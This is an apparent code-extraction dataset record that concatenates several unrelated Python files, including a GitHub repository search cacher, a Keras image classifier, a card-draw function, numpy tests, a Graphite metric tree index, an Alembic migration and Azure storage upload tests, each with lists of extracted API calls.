'import PySimpleGUI as sg\n'), ((8856, 8900), 'PySimpleGUI.InputText', 'sg.InputText', ([], {'key': '"""-ADDRESS-"""', 'size': '(20, 20)'}), "(key='-ADDRESS-', size=(20, 20))\n", (8868, 8900), True, 'import PySimpleGUI as sg\n'), ((8902, 8921), 'PySimpleGUI.Text', 'sg.Text', (['"""Amount: """'], {}), "('Amount: ')\n", (8909, 8921), True, 'import PySimpleGUI as sg\n'), ((8928, 8970), 'PySimpleGUI.InputText', 'sg.InputText', ([], {'key': '"""-AMOUNT-"""', 'size': '(8, 20)'}), "(key='-AMOUNT-', size=(8, 20))\n", (8940, 8970), True, 'import PySimpleGUI as sg\n'), ((8972, 9001), 'PySimpleGUI.Button', 'sg.Button', (['"""Send Transaction"""'], {}), "('Send Transaction')\n", (8981, 9001), True, 'import PySimpleGUI as sg\n'), ((9009, 9026), 'PySimpleGUI.Button', 'sg.Button', (['"""Exit"""'], {}), "('Exit')\n", (9018, 9026), True, 'import PySimpleGUI as sg\n'), ((10310, 
10336), 'json.dumps', 'json.dumps', (['sent'], {'indent': '(2)'}), '(sent, indent=2)\n', (10320, 10336), False, 'import json\n'), ((10361, 10391), 'json.dumps', 'json.dumps', (['received'], {'indent': '(2)'}), '(received, indent=2)\n', (10371, 10391), False, 'import json\n'), ((10711, 10770), 'PySimpleGUI.Window', 'sg.Window', (['"""Transaction History"""', 'transaction_window_layout'], {}), "('Transaction History', transaction_window_layout)\n", (10720, 10770), True, 'import PySimpleGUI as sg\n'), ((349, 383), 'os.path.isfile', 'os.path.isfile', (['"""data/wallet.json"""'], {}), "('data/wallet.json')\n", (363, 383), False, 'import os\n'), ((1412, 1434), 'os.path.exists', 'os.path.exists', (['"""data"""'], {}), "('data')\n", (1426, 1434), False, 'import os\n'), ((1448, 1467), 'os.makedirs', 'os.makedirs', (['"""data"""'], {}), "('data')\n", (1459, 1467), False, 'import os\n'), ((1484, 1518), 'os.path.isfile', 'os.path.isfile', (['"""data/wallet.json"""'], {}), "('data/wallet.json')\n", (1498, 1518), False, 'import os\n'), ((2551, 2577), 'json.dumps', 'json.dumps', (['data'], {'indent': '(6)'}), '(data, indent=6)\n', (2561, 2577), False, 'import json\n'), ((3037, 3049), 'Crypto.Hash.SHA256.new', 'SHA256.new', ([], {}), '()\n', (3047, 3049), False, 'from Crypto.Hash import SHA256\n'), ((3167, 3182), 'Crypto.Hash.RIPEMD160.new', 'RIPEMD160.new', ([], {}), '()\n', (3180, 3182), False, 'from Crypto.Hash import RIPEMD160\n'), ((6388, 6476), 'requests.post', 'requests.post', (['f"""http://{node}/transactions/new"""'], {'json': 'transaction', 'headers': 'headers'}), "(f'http://{node}/transactions/new', json=transaction, headers=\n headers)\n", (6401, 6476), False, 'import requests\n'), ((7730, 7766), 'requests.get', 'requests.get', (['f"""http://{node}/chain"""'], {}), "(f'http://{node}/chain')\n", (7742, 7766), False, 'import requests\n'), ((8054, 8090), 'requests.get', 'requests.get', (['f"""http://{node}/chain"""'], {}), "(f'http://{node}/chain')\n", (8066, 8090), 
False, 'import requests\n'), ((8359, 8395), 'requests.get', 'requests.get', (['f"""http://{node}/chain"""'], {}), "(f'http://{node}/chain')\n", (8371, 8395), False, 'import requests\n'), ((11128, 11269), 'PySimpleGUI.popup', 'sg.popup', (['"""Transaction submitted and accepted by network...\nPlease wait for next block confirmation for transaction to confirm"""'], {}), '(\n """Transaction submitted and accepted by network...\nPlease wait for next block confirmation for transaction to confirm"""\n )\n', (11136, 11269), True, 'import PySimpleGUI as sg\n'), ((11382, 11415), 'PySimpleGUI.popup', 'sg.popup', (['"""Transaction Cancelled"""'], {}), "('Transaction Cancelled')\n", (11390, 11415), True, 'import PySimpleGUI as sg\n'), ((11442, 11595), 'PySimpleGUI.popup', 'sg.popup', (['"""Transaction denied by network\nyou either have unconfirmed transactions in the mempool or insufficient balance.\nPlease try again"""'], {}), '(\n """Transaction denied by network\nyou either have unconfirmed transactions in the mempool or insufficient balance.\nPlease try again"""\n )\n', (11450, 11595), True, 'import PySimpleGUI as sg\n'), ((484, 547), 'PySimpleGUI.Text', 'sg.Text', (['"""Please enter the address/ip and port of a known node"""'], {}), "('Please enter the address/ip and port of a known node')\n", (491, 547), True, 'import PySimpleGUI as sg\n'), ((569, 583), 'PySimpleGUI.InputText', 'sg.InputText', ([], {}), '()\n', (581, 583), True, 'import PySimpleGUI as sg\n'), ((605, 616), 'PySimpleGUI.Submit', 'sg.Submit', ([], {}), '()\n', (614, 616), True, 'import PySimpleGUI as sg\n'), ((618, 629), 'PySimpleGUI.Cancel', 'sg.Cancel', ([], {}), '()\n', (627, 629), True, 'import PySimpleGUI as sg\n'), ((1873, 1901), 'binascii.hexlify', 'binascii.hexlify', (['public_key'], {}), '(public_key)\n', (1889, 1901), False, 'import binascii\n'), ((2792, 2825), 'json.dumps', 'json.dumps', (['block'], {'sort_keys': '(True)'}), '(block, sort_keys=True)\n', (2802, 2825), False, 'import json\n'), 
((2850, 2878), 'hashlib.sha256', 'hashlib.sha256', (['block_string'], {}), '(block_string)\n', (2864, 2878), False, 'import hashlib\n'), ((5088, 5146), 'PySimpleGUI.Text', 'sg.Text', (['"""Are you sure you want to send this Transaction?"""'], {}), "('Are you sure you want to send this Transaction?')\n", (5095, 5146), True, 'import PySimpleGUI as sg\n'), ((5428, 5463), 'PySimpleGUI.Text', 'sg.Text', (['fee'], {'justification': '"""right"""'}), "(fee, justification='right')\n", (5435, 5463), True, 'import PySimpleGUI as sg\n'), ((5530, 5574), 'PySimpleGUI.Text', 'sg.Text', (['total_amount'], {'justification': '"""right"""'}), "(total_amount, justification='right')\n", (5537, 5574), True, 'import PySimpleGUI as sg\n'), ((6664, 6696), 'json.dumps', 'json.dumps', (['data'], {'sort_keys': '(True)'}), '(data, sort_keys=True)\n', (6674, 6696), False, 'import json\n'), ((6785, 6815), 'Crypto.Signature.pkcs1_15.new', 'pkcs1_15.new', (['self.private_key'], {}), '(self.private_key)\n', (6797, 6815), False, 'from Crypto.Signature import pkcs1_15\n'), ((10444, 10473), 'PySimpleGUI.Text', 'sg.Text', (['"""Sent Transactions:"""'], {}), "('Sent Transactions:')\n", (10451, 10473), True, 'import PySimpleGUI as sg\n'), ((10489, 10528), 'PySimpleGUI.Multiline', 'sg.Multiline', (['sent_json'], {'size': '(100, 25)'}), '(sent_json, size=(100, 25))\n', (10501, 10528), True, 'import PySimpleGUI as sg\n'), ((10544, 10577), 'PySimpleGUI.Text', 'sg.Text', (['"""Received Transactions:"""'], {}), "('Received Transactions:')\n", (10551, 10577), True, 'import PySimpleGUI as sg\n'), ((10593, 10636), 'PySimpleGUI.Multiline', 'sg.Multiline', (['received_json'], {'size': '(100, 25)'}), '(received_json, size=(100, 25))\n', (10605, 10636), True, 'import PySimpleGUI as sg\n'), ((10653, 10670), 'PySimpleGUI.Button', 'sg.Button', (['"""Exit"""'], {}), "('Exit')\n", (10662, 10670), True, 'import PySimpleGUI as sg\n'), ((5163, 5205), 'PySimpleGUI.Text', 'sg.Text', (['"""Recipient"""'], {'justification': 
'"""left"""'}), "('Recipient', justification='left')\n", (5170, 5205), True, 'import PySimpleGUI as sg\n'), ((5207, 5248), 'PySimpleGUI.Text', 'sg.Text', (['recipient'], {'justification': '"""right"""'}), "(recipient, justification='right')\n", (5214, 5248), True, 'import PySimpleGUI as sg\n'), ((5266, 5315), 'PySimpleGUI.Text', 'sg.Text', (['"""Amount to send: """'], {'justification': '"""left"""'}), "('Amount to send: ', justification='left')\n", (5273, 5315), True, 'import PySimpleGUI as sg\n'), ((5319, 5357), 'PySimpleGUI.Text', 'sg.Text', (['amount'], {'justification': '"""right"""'}), "(amount, justification='right')\n", (5326, 5357), True, 'import PySimpleGUI as sg\n'), ((5375, 5425), 'PySimpleGUI.Text', 'sg.Text', (['"""Transaction Fee: """'], {'justification': '"""left"""'}), "('Transaction Fee: ', justification='left')\n", (5382, 5425), True, 'import PySimpleGUI as sg\n'), ((5480, 5527), 'PySimpleGUI.Text', 'sg.Text', (['"""Total Amount: """'], {'justification': '"""left"""'}), "('Total Amount: ', justification='left')\n", (5487, 5527), True, 'import PySimpleGUI as sg\n'), ((5591, 5611), 'PySimpleGUI.Button', 'sg.Button', (['"""Confirm"""'], {}), "('Confirm')\n", (5600, 5611), True, 'import PySimpleGUI as sg\n'), ((5615, 5632), 'PySimpleGUI.Button', 'sg.Button', (['"""Exit"""'], {}), "('Exit')\n", (5624, 5632), True, 'import PySimpleGUI as sg\n')] |
import requests
import json
import time
import os
import sys
green = "\x1b[38;2;0;255;0m"
greenish = "\x1b[38;2;93;173;110m"
red = "\x1b[38;2;255;0;0m"
grey = "\x1b[38;2;193;184;192m"
reset = "\033[0m"
clear_line = "\033[0K"
# Maximum repository size in megabytes
MAX_REPO_SIZE = 5


def load_cache():
    """Load cached GitHub search results from the ``sources`` directory.

    Reads every ``*.json`` page written by ``create_cache`` and returns a
    list of ``{"url": ..., "score": ...}`` dicts, one per unique clone URL.
    Repositories larger than ``MAX_REPO_SIZE`` MB are skipped.
    """
    result = []
    seen = set()
    for file_name in os.listdir("sources"):
        if not file_name.endswith(".json"):
            continue
        # Context manager so the file handle is closed promptly
        # (the original open(...).read() leaked the handle).
        with open(os.path.join("sources", file_name)) as fh:
            payload = json.load(fh)
        for item in payload["items"]:
            # GitHub reports repository size in kilobytes.
            size_in_mb = item["size"]/1000
            if size_in_mb > MAX_REPO_SIZE:
                continue
            url = item["clone_url"]
            if url not in seen:
                seen.add(url)
                result.append({
                    "url": url,
                    "score": item["stargazers_count"] + 0.5*item["watchers_count"] + 1,
                })
    return result
def create_cache():
    """Search GitHub for Java repositories and cache each result page.

    Result pages are written to ``sources/query_<id>_page_<n>.json`` so
    later runs (and ``load_cache``) can reuse them.  Pages already on disk
    are skipped; a query stops early when GitHub reports its 1000-result
    cap.
    """
    print(green + "Searching github..." + reset)
    if not os.path.exists("sources"):
        os.mkdir("sources")
    queries = ["utilities", "", "useful", "tools"]
    for query_id, query in enumerate(queries):
        page = 1
        print("\r" + clear_line + "\n" + greenish +
              "Searching using query '{}' (id: {})".format(query, query_id))
        while page < 100:
            path = "sources/query_{}_page_{}.json".format(query_id, page)
            if os.path.exists(path):
                # Page already cached on disk -- skip the network call.
                print("\r" + clear_line + green +
                      "Skipping page {}, using data from cache...".format(page) + reset)
                page += 1
                continue
            else:
                print("\r" + clear_line + green +
                      "Searching page {}... ".format(page) + reset, end="")
            r = requests.get(
                "https://api.github.com/search/repositories?q={}+language:java&sort=stars&order=desc&page={}".format(query, page))
            if not r.ok:
                # GitHub serves at most the first 1000 results per query;
                # detect that case from the error body and move on.
                if "Only the first 1000 search results are available" in r.text:
                    print(
                        "limit reached: only the first 1000 search results are available")
                    break
                # Any other failure: back off briefly and retry this page.
                print(red + "Query failed\n" + r.text + reset)
                print("Sleeping for some time before retrying")
                time.sleep(10)
                continue
            try:
                data = json.loads(r.text)
            except Exception as e:
                # Malformed response body -- back off and retry this page.
                print("Json parsing failed")
                print(e)
                print("Sleeping for some time before retrying", end="")
                time.sleep(10)
                continue
            print(green + "done" + reset)
            with open(path, "w") as f:
                f.write(json.dumps(data))
            page += 1
            # Github rate limit of 10 requests per minute
            print(grey + "Sleeping due to rate limit..." + reset, end="")
            sys.stdout.flush()
            time.sleep(60/10)


if __name__ == "__main__":
    create_cache()
    print(load_cache())
| [
"os.path.exists",
"json.loads",
"os.listdir",
"json.dumps",
"time.sleep",
"os.mkdir",
"sys.stdout.flush"
] | [((353, 374), 'os.listdir', 'os.listdir', (['"""sources"""'], {}), "('sources')\n", (363, 374), False, 'import os\n'), ((1048, 1073), 'os.path.exists', 'os.path.exists', (['"""sources"""'], {}), "('sources')\n", (1062, 1073), False, 'import os\n'), ((1083, 1102), 'os.mkdir', 'os.mkdir', (['"""sources"""'], {}), "('sources')\n", (1091, 1102), False, 'import os\n'), ((1463, 1483), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (1477, 1483), False, 'import os\n'), ((2997, 3015), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (3013, 3015), False, 'import sys\n'), ((3028, 3047), 'time.sleep', 'time.sleep', (['(60 / 10)'], {}), '(60 / 10)\n', (3038, 3047), False, 'import time\n'), ((485, 501), 'json.loads', 'json.loads', (['text'], {}), '(text)\n', (495, 501), False, 'import json\n'), ((2373, 2387), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (2383, 2387), False, 'import time\n'), ((2454, 2472), 'json.loads', 'json.loads', (['r.text'], {}), '(r.text)\n', (2464, 2472), False, 'import json\n'), ((2666, 2680), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (2676, 2680), False, 'import time\n'), ((2812, 2828), 'json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (2822, 2828), False, 'import json\n')] |
from model import make_model, IMAGE_SIZE
from tensorflow.keras.preprocessing.image import ImageDataGenerator
# Build the CNN defined in model.py.
model = make_model()
batch_size = 16
# this is the augmentation configuration we will use for training
train_datagen = ImageDataGenerator(
        rescale=1./255,
        shear_range=0.2,
        zoom_range=0.2,
        horizontal_flip=True)
# this is the augmentation configuration we will use for testing:
# only rescaling
test_datagen = ImageDataGenerator(rescale=1./255)
# this is a generator that will read pictures found in
# subfolders of 'PokemonData/' (one subfolder per class) and
# indefinitely generate batches of augmented image data
train_generator = train_datagen.flow_from_directory(
        'PokemonData/',  # this is the target directory
        target_size=IMAGE_SIZE,  # all images resized to IMAGE_SIZE (defined in model.py)
        batch_size=batch_size,
        class_mode='categorical')  # one-hot labels for a categorical_crossentropy head
# this is a similar generator, for validation data
# NOTE(review): it reads the same 'PokemonData/' directory as training --
# there is no held-out split here; confirm this is intentional.
validation_generator = test_datagen.flow_from_directory(
        'PokemonData/',
        target_size=IMAGE_SIZE,
        batch_size=batch_size,
        class_mode='categorical')
# NOTE(review): fit_generator is deprecated in TF2 -- Model.fit accepts
# generators directly.
model.fit_generator(
        train_generator,
        steps_per_epoch=2000 // batch_size,
        epochs=50,
        validation_data=validation_generator,
        validation_steps=800 // batch_size)
# always save your weights after training or during training
model.save_weights('first_try.h5')
"tensorflow.keras.preprocessing.image.ImageDataGenerator",
"model.make_model"
] | [((118, 130), 'model.make_model', 'make_model', ([], {}), '()\n', (128, 130), False, 'from model import make_model, IMAGE_SIZE\n'), ((231, 327), 'tensorflow.keras.preprocessing.image.ImageDataGenerator', 'ImageDataGenerator', ([], {'rescale': '(1.0 / 255)', 'shear_range': '(0.2)', 'zoom_range': '(0.2)', 'horizontal_flip': '(True)'}), '(rescale=1.0 / 255, shear_range=0.2, zoom_range=0.2,\n horizontal_flip=True)\n', (249, 327), False, 'from tensorflow.keras.preprocessing.image import ImageDataGenerator\n'), ((437, 474), 'tensorflow.keras.preprocessing.image.ImageDataGenerator', 'ImageDataGenerator', ([], {'rescale': '(1.0 / 255)'}), '(rescale=1.0 / 255)\n', (455, 474), False, 'from tensorflow.keras.preprocessing.image import ImageDataGenerator\n')] |
"""Написать функцию которая возвращают случайным образом одну карту из стандартной колоды в 36 карт,
где на первом месте номинал карты номинал (6 - 10, J, D, K, A),
а на втором название масти (Hearts, Diamonds, Clubs, Spades)."""
import random
"""faces = ["6", "7", "8", "9", "10", "J", "D", "K", "A"]
suits = ["Hearts", "Diamonds", "Clubs", "Spades"]
a = random.choice(faces)
b = random.choice(suits)
print(a)
print(b)
"""
def carddraw():
    """Draw one card uniformly at random from a 36-card deck.

    Returns a two-element list ``[face, suit]`` where the face is one of
    6-10, J, D, K, A and the suit one of Hearts, Diamonds, Clubs, Spades.
    """
    faces = ["6", "7", "8", "9", "10", "J", "D", "K", "A"]
    suits = ["Hearts", "Diamonds", "Clubs", "Spades"]
    # Build the deck in suit-major order (same order the original loop used).
    deck = [[face, suit] for suit in suits for face in faces]
    return random.choice(deck)


if __name__ == "__main__":
    print(carddraw())
"random.choice"
] | [((674, 694), 'random.choice', 'random.choice', (['cards'], {}), '(cards)\n', (687, 694), False, 'import random\n')] |
# -*- coding: UTF-8 -*-
from unittest import TestCase
class TestNumpy(TestCase):
    """Sanity checks for basic numpy linear algebra operations."""

    def test_dot(self):
        """Matrix-matrix and matrix-vector products match known results."""
        from numpy import array, dot
        lhs = array([[1,2],[3,4]], dtype='int32')
        rhs = array([[5,6],[7,8]], dtype='int32')
        expected = array([[19,22],[43,50]], dtype='int32')
        residual = dot(lhs, rhs) - expected
        for entry in residual.flat:
            self.assertEqual(entry, 0)
        vec = array([1,1], dtype='int32')
        expected_vec = array([3,7], dtype='int32')
        residual_vec = dot(lhs, vec) - expected_vec
        for entry in residual_vec.flat:
            self.assertEqual(entry, 0)

    def test_eig(self):
        """Eigenvector basis diagonalizes the matrix to its eigenvalues."""
        from numpy import array, dot
        from numpy.linalg import eig, inv
        matrix = array([[1,2],[3,4]], dtype='int32')
        eigenvalues, basis = eig(matrix)
        diagonal = dot(dot(inv(basis), matrix), basis)
        for i in range(2):
            self.assertAlmostEqual(eigenvalues[i], diagonal[i,i], places=14)
| [
"numpy.array",
"numpy.dot",
"numpy.linalg.inv",
"numpy.linalg.eig"
] | [((157, 195), 'numpy.array', 'array', (['[[1, 2], [3, 4]]'], {'dtype': '"""int32"""'}), "([[1, 2], [3, 4]], dtype='int32')\n", (162, 195), False, 'from numpy import array, dot\n'), ((205, 243), 'numpy.array', 'array', (['[[5, 6], [7, 8]]'], {'dtype': '"""int32"""'}), "([[5, 6], [7, 8]], dtype='int32')\n", (210, 243), False, 'from numpy import array, dot\n'), ((253, 295), 'numpy.array', 'array', (['[[19, 22], [43, 50]]'], {'dtype': '"""int32"""'}), "([[19, 22], [43, 50]], dtype='int32')\n", (258, 295), False, 'from numpy import array, dot\n'), ((380, 408), 'numpy.array', 'array', (['[1, 1]'], {'dtype': '"""int32"""'}), "([1, 1], dtype='int32')\n", (385, 408), False, 'from numpy import array, dot\n'), ((421, 449), 'numpy.array', 'array', (['[3, 7]'], {'dtype': '"""int32"""'}), "([3, 7], dtype='int32')\n", (426, 449), False, 'from numpy import array, dot\n'), ((641, 679), 'numpy.array', 'array', (['[[1, 2], [3, 4]]'], {'dtype': '"""int32"""'}), "([[1, 2], [3, 4]], dtype='int32')\n", (646, 679), False, 'from numpy import array, dot\n'), ((697, 703), 'numpy.linalg.eig', 'eig', (['A'], {}), '(A)\n', (700, 703), False, 'from numpy.linalg import eig, inv\n'), ((313, 322), 'numpy.dot', 'dot', (['A', 'B'], {}), '(A, B)\n', (316, 322), False, 'from numpy import array, dot\n'), ((469, 478), 'numpy.dot', 'dot', (['A', 'u'], {}), '(A, u)\n', (472, 478), False, 'from numpy import array, dot\n'), ((726, 734), 'numpy.linalg.inv', 'inv', (['mat'], {}), '(mat)\n', (729, 734), False, 'from numpy.linalg import eig, inv\n')] |
# Copyright (C) [2015-2017] [Thomson Reuters LLC]
# Copyright (C) [2015-2017] [<NAME>]
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tree representation of Graphite metrics"""
from __future__ import absolute_import, print_function
import json
from collections import deque
from graphite_api.utils import is_pattern
from graphite_api.finders import match_entries
def _encode_bytes(_str):
if not isinstance(b'', str):
return _str.encode('utf-8')
return bytes(_str)
def _decode_str(_str):
try:
return _str.decode('utf-8')
except AttributeError:
pass
return _str
class Node(object):
    """Node of a graphite metric tree.

    ``children`` is either ``None`` (leaf) or a tuple of
    ``(name, Node)`` pairs; tuples keep the per-node footprint small.
    """
    # ('children') was a plain string -- valid for a single slot, but the
    # conventional (and extension-safe) spelling is a one-element tuple.
    __slots__ = ('children',)

    def __init__(self):
        self.children = None

    def is_leaf(self):
        """Returns True/False depending on whether self is a LeafNode or not"""
        return self.children is None

    def insert(self, paths):
        """Insert ``paths`` (a deque of path components) below this node."""
        if len(paths) == 0:
            return
        if self.children is None:
            self.children = ()
        child_name = paths.popleft()
        for (_child_name, node) in self.children:
            # Fast path for end of recursion - avoids extra recursion
            # for empty paths list
            if len(paths) == 0 and child_name == _child_name:
                return
            elif child_name == _child_name:
                return node.insert(paths)
        node = Node()
        self.children += ((child_name, node),)
        return node.insert(paths)

    def to_array(self):
        """Return nested ``[(name, children), ...]`` for this node's children."""
        return [(_decode_str(name), node.to_array(),)
                for (name, node,) in self.children] \
            if self.children is not None else None

    @staticmethod
    def from_array(array):
        """Rebuild a Node subtree from the output of :meth:`to_array`."""
        metric = Node()
        if array is None:
            return metric
        metric.children = ()
        for child_name, child_array in array:
            child = Node.from_array(child_array)
            metric.children += ((_encode_bytes(child_name), child),)
        return metric
class NodeTreeIndex(object):
    """Node tree index class with graphite glob searches per sub-part of a
    query
    """
    # NOTE(review): ('index') is a plain string, not a tuple -- it works for
    # a single slot, but ('index',) is the conventional spelling.
    __slots__ = ('index')

    @property
    def children(self):
        """Children of the root node (empty list when the tree is empty)."""
        return self.index.children if self.index.children else []

    def __init__(self):
        self.index = Node()

    def insert(self, metric_path):
        """Insert metric path into tree index"""
        # Path components are stored as UTF-8 bytes to save memory.
        paths = deque([_encode_bytes(s) for s in metric_path.split('.')])
        self.index.insert(paths)

    def insert_split_path(self, paths):
        """Insert already split path into tree index"""
        self.index.insert(deque([_encode_bytes(s) for s in paths]))

    def clear(self):
        """Clear tree index"""
        self.index.children = None

    def query(self, query):
        """Return nodes matching Graphite glob pattern query"""
        # Sorted for deterministic ordering; yields ('dotted.path', node).
        nodes = sorted(self.search(self.index, query.split('.'), []))
        return (('.'.join(path), node,)
                for path, node in nodes)

    def _get_children_from_matched_paths(self, matched_paths, node):
        # Yield (decoded_name, child) pairs whose name survived the glob match.
        for (path, _node) in node.children:
            _path = _decode_str(path)
            if _path in matched_paths:
                yield (_path, _node)

    def _get_child_from_string_query(self, sub_query, node):
        # Exact (non-glob) lookup of a single child by name; None if absent.
        for (path, _node) in node.children:
            if _decode_str(path) == sub_query:
                return _node

    def _get_matched_children(self, sub_query, node):
        """Return (name, node) pairs of children matching one query part,
        using glob matching for pattern parts and exact lookup otherwise."""
        keys = [_decode_str(key) for (key, _) in node.children] \
            if node.children is not None else []
        matched_paths = match_entries(keys, sub_query)
        if node.children is not None and is_pattern(sub_query):
            matched_children = self._get_children_from_matched_paths(
                matched_paths, node)
        else:
            # Non-pattern part: at most one exact child match.
            matched_children = [(sub_query,
                                 self._get_child_from_string_query(
                                     sub_query, node))] \
                if node.children is not None \
                and sub_query in keys else []
        return matched_children

    def search(self, node, split_query, split_path):
        """Return matching children for each query part in split query starting
        from given node"""
        sub_query = split_query[0]
        matched_children = self._get_matched_children(sub_query, node)
        for child_name, child_node in matched_children:
            child_path = split_path[:]
            child_path.append(child_name)
            child_query = split_query[1:]
            if len(child_query) > 0:
                # More query parts remain -- recurse into the child.
                for sub in self.search(child_node, child_query, child_path):
                    yield sub
            else:
                yield (child_path, child_node)

    def to_array(self):
        """Return array representation of tree index"""
        return self.index.to_array()

    @staticmethod
    def from_array(model):
        """Load tree index from array"""
        metric_index = NodeTreeIndex()
        metric_index.index = Node.from_array(model)
        return metric_index

    @staticmethod
    def from_file(file_h):
        """Load tree index from file handle"""
        index = NodeTreeIndex.from_array(json.load(file_h))
        return index
| [
"json.load",
"graphite_api.finders.match_entries",
"graphite_api.utils.is_pattern"
] | [((4330, 4360), 'graphite_api.finders.match_entries', 'match_entries', (['keys', 'sub_query'], {}), '(keys, sub_query)\n', (4343, 4360), False, 'from graphite_api.finders import match_entries\n'), ((4402, 4423), 'graphite_api.utils.is_pattern', 'is_pattern', (['sub_query'], {}), '(sub_query)\n', (4412, 4423), False, 'from graphite_api.utils import is_pattern\n'), ((5996, 6013), 'json.load', 'json.load', (['file_h'], {}), '(file_h)\n', (6005, 6013), False, 'import json\n')] |
"""create pipeline_retries table
Revision ID: d04cf726555d
Revises: <PASSWORD>
Create Date: 2021-09-02 13:04:36.053768
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd04cf726555d'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
    """Create the pipeline_retries table and its foreign key to pipelines.name."""
    columns = (
        sa.Column('pipeline_id', sa.String, primary_key=True),
        sa.Column('number_of_error_statuses', sa.Integer, nullable=False),
    )
    op.create_table('pipeline_retries', *columns)
    op.create_foreign_key(
        'fk_pipeline_retries_pipeline',
        'pipeline_retries',
        'pipelines',
        ['pipeline_id'],
        ['name'],
    )
def downgrade():
    """Drop the pipeline_retries table created by upgrade()."""
    op.drop_table('pipeline_retries')
| [
"alembic.op.drop_table",
"sqlalchemy.Column",
"alembic.op.create_foreign_key"
] | [((522, 639), 'alembic.op.create_foreign_key', 'op.create_foreign_key', (['"""fk_pipeline_retries_pipeline"""', '"""pipeline_retries"""', '"""pipelines"""', "['pipeline_id']", "['name']"], {}), "('fk_pipeline_retries_pipeline', 'pipeline_retries',\n 'pipelines', ['pipeline_id'], ['name'])\n", (543, 639), False, 'from alembic import op\n'), ((659, 692), 'alembic.op.drop_table', 'op.drop_table', (['"""pipeline_retries"""'], {}), "('pipeline_retries')\n", (672, 692), False, 'from alembic import op\n'), ((383, 436), 'sqlalchemy.Column', 'sa.Column', (['"""pipeline_id"""', 'sa.String'], {'primary_key': '(True)'}), "('pipeline_id', sa.String, primary_key=True)\n", (392, 436), True, 'import sqlalchemy as sa\n'), ((446, 511), 'sqlalchemy.Column', 'sa.Column', (['"""number_of_error_statuses"""', 'sa.Integer'], {'nullable': '(False)'}), "('number_of_error_statuses', sa.Integer, nullable=False)\n", (455, 511), True, 'import sqlalchemy as sa\n')] |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
from azure.cli.testsdk import (ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest)
from ..storage_test_util import StorageScenarioMixin
class StorageFileShareScenarios(StorageScenarioMixin, ScenarioTest):
    """Scenario tests for `az storage file upload` against a live file share."""

    @ResourceGroupPreparer()
    @StorageAccountPreparer()
    def test_storage_file_upload_small_file_v2(self, resource_group, storage_account_info):
        """Upload a small local file to the share root, to directories and to
        explicit destination paths, verifying content settings and metadata."""
        account_info = storage_account_info
        share_name = self.create_share(account_info)
        # 'upload_file' ships next to this test module; escape backslashes
        # so the path survives CLI argument parsing on Windows.
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        local_file = os.path.join(curr_dir, 'upload_file').replace('\\', '\\\\')
        local_file_name = 'upload_file'
        # Upload to the share root with explicit content settings + metadata.
        self.storage_cmd('storage file upload -s {} --source "{}" '
                         '--content-cache-control no-cache '
                         '--content-disposition attachment '
                         '--content-encoding compress '
                         '--content-language en-US '
                         '--content-type "multipart/form-data;" '
                         '--metadata key=val ', account_info, share_name, local_file)
        # Verify every content setting and the metadata round-tripped.
        self.storage_cmd('storage file show -s {} -p "{}"', account_info, share_name, local_file_name) \
            .assert_with_checks(JMESPathCheck('name', local_file_name),
                                JMESPathCheck('properties.contentSettings.cacheControl', 'no-cache'),
                                JMESPathCheck('properties.contentSettings.contentDisposition', 'attachment'),
                                JMESPathCheck('properties.contentSettings.contentEncoding', 'compress'),
                                JMESPathCheck('properties.contentSettings.contentLanguage', 'en-US'),
                                JMESPathCheck('properties.contentSettings.contentType', 'multipart/form-data;'),
                                JMESPathCheck('metadata', {'key': 'val'}))
        dest_dir = 'dest_dir'
        # Uploading into a directory that does not exist yet must fail.
        from azure.core.exceptions import ResourceNotFoundError
        with self.assertRaises(ResourceNotFoundError):
            self.storage_cmd('storage file upload -s {} --source "{}" -p {}',
                             account_info, share_name, local_file, dest_dir)
        # After creating the directory the same upload succeeds.
        self.storage_cmd('storage directory create -s {} -n {}', account_info, share_name, dest_dir)
        self.storage_cmd('storage file upload -s {} --source "{}" -p {}',
                         account_info, share_name, local_file, dest_dir)
        self.storage_cmd('storage file show -s {} -p "{}"', account_info, share_name, dest_dir + '/' + local_file_name) \
            .assert_with_checks(JMESPathCheck('name', local_file_name))
        # Destination path may rename the file at the share root ...
        dest_file = 'dest_file.json'
        self.storage_cmd('storage file upload -s {} --source "{}" -p {}',
                         account_info, share_name, local_file, dest_file)
        self.storage_cmd('storage file show -s {} -p "{}"', account_info, share_name, dest_file) \
            .assert_with_checks(JMESPathCheck('name', dest_file))
        # ... or rename it inside an existing directory.
        dest_path = dest_dir + '/' + dest_file
        self.storage_cmd('storage file upload -s {} --source "{}" -p {}',
                         account_info, share_name, local_file, dest_path)
        self.storage_cmd('storage file show -s {} -p "{}"', account_info, share_name, dest_path) \
            .assert_with_checks(JMESPathCheck('name', dest_file))
        # Nested sub-directory: keep the original file name ...
        sub_deep_path = dest_dir + '/' + 'sub_dir'
        self.storage_cmd('storage directory create -s {} -n {}', account_info, share_name, sub_deep_path)
        self.storage_cmd('storage file upload -s {} --source "{}" -p {}',
                         account_info, share_name, local_file, sub_deep_path)
        self.storage_cmd('storage file show -s {} -p "{}"', account_info, share_name,
                         sub_deep_path + '/' + local_file_name). \
            assert_with_checks(JMESPathCheck('name', local_file_name))
        # ... or rename it there via a full destination path.
        sub_deep_file = sub_deep_path + '/' + dest_file
        self.storage_cmd('storage file upload -s {} --source "{}" -p {}',
                         account_info, share_name, local_file, sub_deep_file)
        self.storage_cmd('storage file show -s {} -p "{}"', account_info, share_name,
                         sub_deep_file).assert_with_checks(JMESPathCheck('name', dest_file))
| [
